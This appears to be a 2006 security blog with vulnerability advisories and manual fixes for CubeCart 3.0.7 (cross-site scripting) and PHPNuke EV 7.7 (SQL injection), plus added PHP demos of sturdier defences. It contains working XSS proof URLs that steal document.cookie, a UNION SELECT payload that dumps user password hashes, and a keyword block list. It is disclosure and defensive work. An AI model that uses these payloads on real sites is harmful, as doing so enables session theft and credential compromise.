MANUAL FIX FOR CROSS-SITE SCRIPTING CubeCart 3.0.7 pl1

Monday, January 23, 2006
########################################################
MANUAL FIX FOR CROSS-SITE SCRIPTING CubeCart 3.0.7 pl1
vendor entry: http://bugs.cubecart.com/?do=details&id=459
advisory: http://lostmon.blogspot.com/2006/01/cubecart-307-pl1-indexphp-multiple.html
references:
OSVDB ID:22471
Secunia:SA18519
BID:16259
##########################################################

1- includes/functions.inc.php
2- index.php fix params 'act' and 'searchStr'
3- fix 'catId' param includes/content/viewCat.inc.php
4- fix 'productId' param open includes/content/viewProd.inc.php
5- cart.php fix params 'act' and 'searchStr'
6- fix param 'docId' includes/content/viewDoc.inc.php
7- fix 'act', 'username', 'password', 'remember' and 'redir' params in includes/content/login.inc.php
8- fix 'productId' and $_POST includes/content/tellafriend.inc.php
9- Thanks
#############################
1 includes/functions.inc.php
#############################

open includes/functions.inc.php and look for this code:

around line 82 ...
-------------------------------------------------------
//////////////////////////////////
// treat GET vars stop XSS
////////
function treatGet($text){

// strip backslashes; inside a double-quoted PHP string the backslash has to be
// written as "\\\\" so that PCRE receives one escaped backslash
$text = preg_replace("/(\\\\)/si", "", $text);
// drop any HTML or PHP tags
$text = strip_tags($text);
// remove the characters that open or close a tag or attribute
$text = str_replace(array("'","\"",">","<","\\"), "", $text);
return $text;

}
---------------------------------------------------------

if your copy of this function looks different, replace it with the code above...

#########################################
2- index.php param 'act' and 'searchStr'
#########################################

open index.php; at line 90 you have this for the 'act' param:

------------------------------
if(isset($_GET['act'])){
switch ($_GET['act']) {

-----------------------------------------

change it to this:

-------------------------------------------

$_GET['act'] = treatGet($_GET['act']);
if(isset($_GET['act'])){
switch ($_GET['act']) {
---------------------------------------------------

in index.php, at line 80 you have this for the 'searchStr' param:

-----------------------------------------------------

if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));
-------------------------------------------------------

change it to this:

--------------------------------------------

$_GET['searchStr'] = treatGet($_GET['searchStr']);
if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));
--------------------------------------------------

#######################################################
3- fix 'catId' param includes/content/viewCat.inc.php
#######################################################

to fix the 'catId' param, open includes/content/viewCat.inc.php

find this code at line 50:

--------------------------------------------------
if(isset($_GET['catId'])) {

----------------------------------------

change it to this:
-----------------------------------------

$_GET['catId'] = treatGet($_GET['catId']);
if(isset($_GET['catId'])) {

-----------------------------------------

###################################################
4- fix 'productId' param includes/content/viewProd.inc.php
####################################################

at line 38 you have:

--------------------------------------------------

// query database
$query = "SELECT productId, productCode, quantity, name, description, image,

-----------------------------------------------------------------

change it to this:

------------------------------------------------------
// query database
$_GET['productId'] = treatGet($_GET['productId']);
$query = "SELECT productId, productCode, quantity, name, description, image,

---------------------------------------------------------------------

##############################################
5- cart.php fix params 'act' and 'searchStr'
##############################################

open cart.php; to fix the 'act' param, look for this code:

-------------------------------------------
// START MAIN CONTENT
switch ($_GET['act']) {
--------------------------------------------

replace it with this:

---------------------------------------------

// START MAIN CONTENT
$_GET['act'] = treatGet($_GET['act']);
switch ($_GET['act']) {
----------------------------------------------

around line 69 you have:
--------------------------------
if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",$_GET['searchStr']);

------------------------------------------

change it to this:

------------------------------------------

$_GET['searchStr'] = treatGet($_GET['searchStr']);
if(isset($_GET['searchStr'])){
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));
---------------------------------------------

#######################################################
6- fix param 'docId' includes/content/viewDoc.inc.php
#######################################################

insert this line at line 36:
--------------------------------------
$_GET['docId'] = treatGet($_GET['docId']);
------------------------------------------

#######################################################
7- fix 'act' , 'username' ,'password','remember' and
'redir' params in includes/content/login.inc.php
#######################################################

insert these lines at line 35:
---------------------------------------------------------

$_GET['act'] = treatGet($_GET['act']);
$_POST['username'] = treatGet($_POST['username']);
$_POST['password'] = treatGet($_POST['password']);
-----------------------------------------------------------

to fix the 'redir' param, insert this line after line 52:

---------------------------------------------
//"login","reg","unsubscribe","forgotPass"
$_GET['redir'] = treatGet($_GET['redir']);
-------------------------------------------------------------

to fix the 'remember' param, insert this code at line 52:

---------------------------------------------

$_POST['remember'] = treatGet($_POST['remember']);

-------------------------------------------------


######################################
8- fix 'productId' and $_POST
includes/content/tellafriend.inc.php
######################################

open includes/content/tellafriend.inc.php

add this line after line 35 to fix the 'productId' param:

------------------------------

// query database
$_GET['productId'] = treatGet($_GET['productId']);

-------------------------------------------------------

to fix XSS in all the form fields when posting,
around line 58 you have this:

----------------------------------------------------
$text = sprintf($lang['front']['tellafriend']['email_body'],$_POST['recipName'],stripslashes($_POST['message']),$GLOBALS['storeURL'],$_GET['productId'],$GLOBALS['storeURL'],$_SERVER['REMOTE_ADDR']);
----------------------------------------------------

change it to this:
----------------------------------------------------

$text = sprintf($lang['front']['tellafriend']['email_body'],treatGet($_POST['recipName']),stripslashes(treatGet($_POST['message'])),$GLOBALS['storeURL'],treatGet($_GET['productId']),$GLOBALS['storeURL'],$_SERVER['REMOTE_ADDR']);

------------------------------------------------------
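As an added example (not CubeCart's code and not part of this fix), the block below puts the treatGet() from section 1 next to the two controls a defender would usually reach for instead of stripping characters from $_GET and $_POST at every entry point as sections 2-8 do: allow-list validation for the identifier parameters (act, productId, catId, docId) and HTML output encoding for free text such as searchStr. The helper names h(), idParam() and actParam(), the sample inputs and the assumption that the original regex was meant to strip backslashes are all mine, not CubeCart API.

```php
<?php
// Added example, not CubeCart's code: the advisory's treatGet() from section 1
// next to allow-list validation and HTML output encoding. Helper names h(),
// idParam() and actParam() and all sample inputs are assumptions for this demo.

// The advisory's treatGet(), with the backslash pattern written as valid PCRE
// (assumption: the original regex was meant to strip backslashes).
function treatGet($text) {
    $text = preg_replace('/\\\\/', '', (string) $text);     // remove backslashes
    $text = strip_tags($text);                               // remove <...> tags
    return str_replace(array("'", '"', '>', '<', '\\'), '', $text);
}

// Output encoding: the value is left intact in PHP and only made safe for the
// HTML context it is printed into (body text or a double-quoted attribute).
function h($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// Allow-list for identifier parameters (productId, docId, catId). catId also
// takes values such as 'saleItems', so letters are accepted alongside digits.
// A value that does not fit is rejected rather than "cleaned".
function idParam(array $src, $key) {
    if (!isset($src[$key]) || !is_string($src[$key])) {
        return null;
    }
    return preg_match('/^[A-Za-z0-9_-]{1,32}$/', $src[$key]) ? $src[$key] : null;
}

// Allow-list for 'act', which selects the switch() branch in index.php and cart.php.
function actParam(array $src, array $allowed, $default) {
    if (isset($src['act']) && in_array($src['act'], $allowed, true)) {
        return $src['act'];
    }
    return $default;
}

// Constructed inputs: a legitimate search term and the payload shape from the advisory.
$samples = array(
    "O'Reilly & Sons",
    '"><script>alert(document.cookie)</script>',
);
foreach ($samples as $s) {
    printf("input:    %s\ntreatGet: %s\nh():      %s\n\n", $s, treatGet($s), h($s));
}

// Constructed request: 'act' and 'productId' carry markup, 'catId' is a normal value.
$get = array(
    'act'       => 'viewProd"><script>',
    'productId' => '1"><script>',
    'catId'     => 'saleItems',
);
var_dump(actParam($get, array('viewProd', 'viewCat', 'viewDoc', 'login'), 'home'));
var_dump(idParam($get, 'productId'));
var_dump(idParam($get, 'catId'));
```

Run it with the php command-line binary. The comparison shows that treatGet() throws away the apostrophe in a legitimate search such as O'Reilly and, for the payload, removes the quote and angle brackets but leaves the script text behind, while h() keeps both inputs intact and gives the browser nothing to parse as markup. The allow-list helpers reject a bad identifier instead of repairing it, which is also the easier event to log and alert on.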

##########################
9- THANKS
##########################

I want to thank all those that believe in me.
To OSVDB (http://www.osvdb.org) for its excellent work.
To all manglers and moderators of OSVDB; they believe in this project and they work for it :)))
To Secunia (http://www.secunia.com) for its verification, publication and follow-up of my work, to Securityfocus (http://www.securityfocus.com)
and to all those who take care that my work is distributed by different means.
Thanks to all those that are still there and all those that are no longer.

CubeCart 3.0.7-pl1 index.php multiple variable cross site scripting

Tuesday, January 10, 2006
################################################
CubeCart 3.0.7-pl1 multiple variable Cross site scripting
Vendor url: www.cubecart.com
bug report:http://bugs.cubecart.com/?do=details&id=459
Advisory: http://lostmon.blogspot.com/2006/01/cubecart-307-pl1-indexphp-multiple.html
vendor notify: yes exploit available: yes
OSVDB ID:22471
Secunia:SA18519
BID:16259
################################################

I recommend that all vendors look at this paper.
This is the new possible impact of XSS attacks:

http://www.bindshell.net/papers/xssv.html

CubeCart contains a flaw that allows a remote cross site scripting
attack. This flaw exists because the application does not validate
some variables upon submission to 'index.php' scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server, leading to a
loss of integrity.

###############
VERSIONS
###############

CubeCart 3.0.7-pl1 vulnerable.
Other versions are possibly vulnerable too.

#################
Timeline
#################

Discovered: 24 dec 2005
vendor notify: 10-01-2006
Vendor response:
Solution:
Disclosure: 10-01-2006
Public disclosure:16-01-2006

###############
Examples:
###############


http://[victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcHQlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZXdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[victim]/cc3/index.php?searchStr=%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat&Submit=Go

http://[victim]/cc3/index.php?act=login&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb2NJZD0x=%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[victim]/cc3/index.php?act=viewProd&productId=1"><script>alert(document.cookie)</script>

http://[victim]/cc3/index.php?act=viewDoc&docId=3"><script>alert(document.cookie)</script>

http://[victim]/cc3/index.php?act=viewProd"><script>alert(document.cookie)</script>

http://[victim]/cc3/index.php?act=viewCat&catId=1"><script>alert(document.cookie)</script>

http://[victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>alert(document.cookie)</script>

http://[victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat

http://[victim]/cc3/index.php?act=viewDoc&docId=1"><script>alert(document.cookie)</script>

#################
User field XSS
#################
Go to http://[victim]/cc3/index.php?act=login
and insert this in the username field: "><script>alert(document.cookie)</script>

#############
SOLUTION
#############

No solution was available at this time.

Currently I found a possible fix:

see
http://lostmon.blogspot.com/2006/01/manual-fix-for-cross-site-scripting.html

or

http://bugs.cubecart.com/?do=details&id=459


##################### €nd ########################

Thnx to Estrella for being my light
Thnx to all manglers of http://www.osvdb.org

--
sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....

PHPNuke EV 7.7 'search' module 'query' variable SQL injection

Monday, January 09, 2006
###############################################
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Vendor url: http://nukevolution.com/
exploit available:yes vendor notify:yes
advisory: http://lostmon.blogspot.com/2006/01/phpnuke-ev-77-search-module-query.html
OSVDB ID: 22316 Related OSVDB: 21002 and 20866
BID: 16186
Secunia: SA18394 Related Secunia: SA17638 and SA17543
################################################

PHPNuke EV 7.7 has a flaw which can be exploited by malicious
people to conduct SQL injection attacks.

Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

#################
versions:
################

PHPNuke EV 7.7 -R1

Possibly prior versions are affected.

##################
solution:
###################

No solution at this time!!!

A possible fix:

Open file modules/Search/index.php and after this code:
------------------------------------
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
----------------------------------------------

you can add this:

------------------------------------

if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}
----------------------------------------------
this is a "simple fix": it only detects the UNION SELECT command and dies
if it is in the query variable... you can write the same code
for UNION ALL SELECT or other variants of the exploit
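As an added example (not PHP-Nuke's code and not part of the advisory), the block below puts the keyword filter above beside a parameterised query, the fix that does not depend on guessing what an injected string looks like. The nuke_stories table, its rows, the hashed-password placeholder and the in-memory SQLite database are constructed for the demo; blocksQuery() and searchStories() are hypothetical helper names.

```php
<?php
// Added example, not PHP-Nuke code. It puts the advisory's keyword filter beside
// a parameterised query. The table, rows and search inputs are constructed for
// the demo and run against an in-memory SQLite database.

// The advisory's "simple fix", using preg_match() because eregi() was removed in PHP 7.0.
function blocksQuery($query) {
    return (bool) preg_match('/UNION SELECT|UNION%20SELECT/i', $query);
}

// Parameterised search: the term is bound as data, so quotes and SQL keywords
// inside it are compared literally instead of being parsed as SQL.
// Assumption: a nuke_stories table with title and hometext columns.
function searchStories(PDO $db, $term) {
    $stmt = $db->prepare(
        'SELECT sid, title FROM nuke_stories WHERE title LIKE :t1 OR hometext LIKE :t2'
    );
    $like = '%' . $term . '%';
    $stmt->execute(array(':t1' => $like, ':t2' => $like));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function demo() {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Constructed schema and rows
    $db->exec('CREATE TABLE nuke_stories (sid INTEGER PRIMARY KEY, title TEXT, hometext TEXT)');
    $db->exec('CREATE TABLE nuke_users (user_id INTEGER, username TEXT, user_password TEXT)');
    $db->exec("INSERT INTO nuke_stories (title, hometext) VALUES ('Site news', 'Welcome to the site')");
    $db->exec("INSERT INTO nuke_users VALUES (2, 'alice', 'HASH-PLACEHOLDER')");

    $inputs = array(
        // ordinary search term
        'news',
        // the advisory's proof string
        "s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*",
        // the UNION ALL SELECT variant the advisory says the filter does not cover
        "s%') UNION ALL SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*",
    );
    foreach ($inputs as $q) {
        $verdict = blocksQuery($q) ? 'filter blocks' : 'filter passes';
        // with binding, the whole term is data and never reaches the SQL parser as syntax
        $rows = searchStories($db, $q);
        printf("%-13s | %d row(s) | %s\n", $verdict, count($rows), substr($q, 0, 36));
    }
}

demo();
```

The filter stops the literal UNION SELECT string but lets the UNION ALL SELECT variant through, which is exactly the gap the text above points out; the bound query returns only the matching story for the ordinary term and no rows for either proof string, because the term is compared as a value rather than spliced into the statement.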


####################
Timeline
####################

discovered:21-11-2005
vendor notify:29-12-2005 (forums)
vendor response:-------
vendor fix:-----
disclosure:09-01-2006

###################
example:
###################

go to
http://[Victim]/modules.php?name=Search

and type this proof of concept into the search box:

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

all users' hashes are then available to view..

#################### €nd ########################

Thnx to Estrella for being my light


--
sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....
 
